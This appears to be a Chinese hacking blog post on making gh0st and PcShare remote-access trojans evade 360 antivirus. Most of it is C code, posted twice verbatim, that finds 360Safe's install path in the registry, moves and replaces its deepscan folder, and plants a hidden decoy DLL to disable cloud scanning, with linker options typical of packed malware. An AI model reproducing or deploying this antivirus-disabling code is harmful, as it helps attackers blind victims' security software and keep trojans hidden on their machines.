ISAP_Rewrite
VC也疯狂一:过360云5月24
12:43 
最近几天潜心学习C++,玩玩gh0st,pcshare源码免杀。360比较垃圾但也难缠,今天我们就把它的云查杀废了,直接上洪流的代码。
// By:洪流
#pragma comment(linker, "/OPT:NOWIN98")
#pragma comment(linker, "/merge:.data=.text")
#pragma comment(linker, "/merge:.rdata=.text")
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/subsystem:windows")
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"MSVCRT.lib")
#pragma comment(linker,"/ENTRY:Torrent /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")
void Torrent()
{
HKEY hKey = NULL;
DWORD len=MAX_PATH;
DWORD type=REG_SZ;
char pBuf[200];
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360Safe.exe",0,KEY_ALL_ACCESS,&hKey);
if (RegQueryValueEx(hKey, "Path" , NULL, &type, (unsigned char*)pBuf, &len) == ERROR_SUCCESS)
{
char TempPath[200];
char exe[200];
char dll[200];
char exe_1[200];
char dll_1[200];
GetTempPath(sizeof(TempPath),TempPath);
wsprintf(TempPath,"%s\\tmp",TempPath);
wsprintf(pBuf,"%s\\deepscan",pBuf);
MoveFile(pBuf,TempPath);
CreateDirectory(pBuf,NULL);
wsprintf(exe,"%s\\360deepscan.exe",TempPath);
wsprintf(dll,"%s\\360wservice.dll",TempPath);
wsprintf(exe_1,"%s\\360deepscan.exe",pBuf);
wsprintf(dll_1,"%s\\360wservice.dll",pBuf);
CopyFile(exe,exe_1,FALSE);
CopyFile(dll,dll_1,FALSE);
FILE *file;
strcat(pBuf,"\\deepscan.dll");
file=fopen(pBuf,"w");
char fuck[10];
wsprintf(fuck,"deepscan");
fputs(fuck,file);
fclose(file);
SetFileAttributes(pBuf, FILE_ATTRIBUTE_HIDDEN);
}
RegCloseKey(hKey);
}
// By:洪流
#pragma comment(linker, "/OPT:NOWIN98")
#pragma comment(linker, "/merge:.data=.text")
#pragma comment(linker, "/merge:.rdata=.text")
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/subsystem:windows")
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"MSVCRT.lib")
#pragma comment(linker,"/ENTRY:Torrent /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")
void Torrent()
{
HKEY hKey = NULL;
DWORD len=MAX_PATH;
DWORD type=REG_SZ;
char pBuf[200];
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360Safe.exe",0,KEY_ALL_ACCESS,&hKey);
if (RegQueryValueEx(hKey, "Path" , NULL, &type, (unsigned char*)pBuf, &len) == ERROR_SUCCESS)
{
char TempPath[200];
char exe[200];
char dll[200];
char exe_1[200];
char dll_1[200];
GetTempPath(sizeof(TempPath),TempPath);
wsprintf(TempPath,"%s\\tmp",TempPath);
wsprintf(pBuf,"%s\\deepscan",pBuf);
MoveFile(pBuf,TempPath);
CreateDirectory(pBuf,NULL);
wsprintf(exe,"%s\\360deepscan.exe",TempPath);
wsprintf(dll,"%s\\360wservice.dll",TempPath);
wsprintf(exe_1,"%s\\360deepscan.exe",pBuf);
wsprintf(dll_1,"%s\\360wservice.dll",pBuf);
CopyFile(exe,exe_1,FALSE);
CopyFile(dll,dll_1,FALSE);
FILE *file;
strcat(pBuf,"\\deepscan.dll");
file=fopen(pBuf,"w");
char fuck[10];
wsprintf(fuck,"deepscan");
fputs(fuck,file);
fclose(file);
SetFileAttributes(pBuf, FILE_ATTRIBUTE_HIDDEN);
}
RegCloseKey(hKey);
}
